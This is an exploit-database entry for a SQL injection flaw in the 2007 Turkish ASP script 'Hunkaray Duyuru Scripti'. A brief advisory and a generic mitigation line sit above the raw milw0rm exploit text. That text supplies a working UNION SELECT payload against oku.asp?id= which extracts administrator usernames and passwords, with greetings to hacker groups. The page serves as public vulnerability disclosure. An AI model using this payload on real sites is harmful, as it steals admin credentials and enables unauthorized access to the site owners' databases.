header-logo
Suggest Exploit
vendor:
Hunkaray Duyuru Scripti (tr)
by:
cl24zy, DrEgHoT, TuF4N
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Hunkaray Duyuru Scripti (tr)
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
2007

Hunkaray Duyuru Scripti (tr) – SQL Injection Vulnerability

The Hunkaray Duyuru Scripti (tr) is vulnerable to SQL Injection. An attacker can exploit this vulnerability to execute arbitrary SQL queries and potentially gain unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use parameterized queries or prepared statements to prevent SQL injection attacks.
Source

Exploit-DB raw data:

###############################################################
#Hunkaray Duyuru Scripti (tr)  == SQL Injection Vulnerability
#Author : cl24zy - DrEgHoT - TuF4N
#Site : www.hacklive.org , www.illegal-attack.org
#Contact: admin@hacklive.org
###############################################################
#Download Hünkaray Duyuru Scripti (tr) : http://www.aspindir.com/Goster/4678
#Demo : http://b.1asphost.com/hunkaray/duyuru

#Exploit;
#Admin Nick, Passport;
http://[SITE]/oku.asp?id=-1%20union+all+select+0,kullaniciadi,sifre,3+from+admin

#Greetz: iLLeGaL-ATTaCK//TiM & HacKLivETeaM
################################################################

# milw0rm.com [2007-01-31]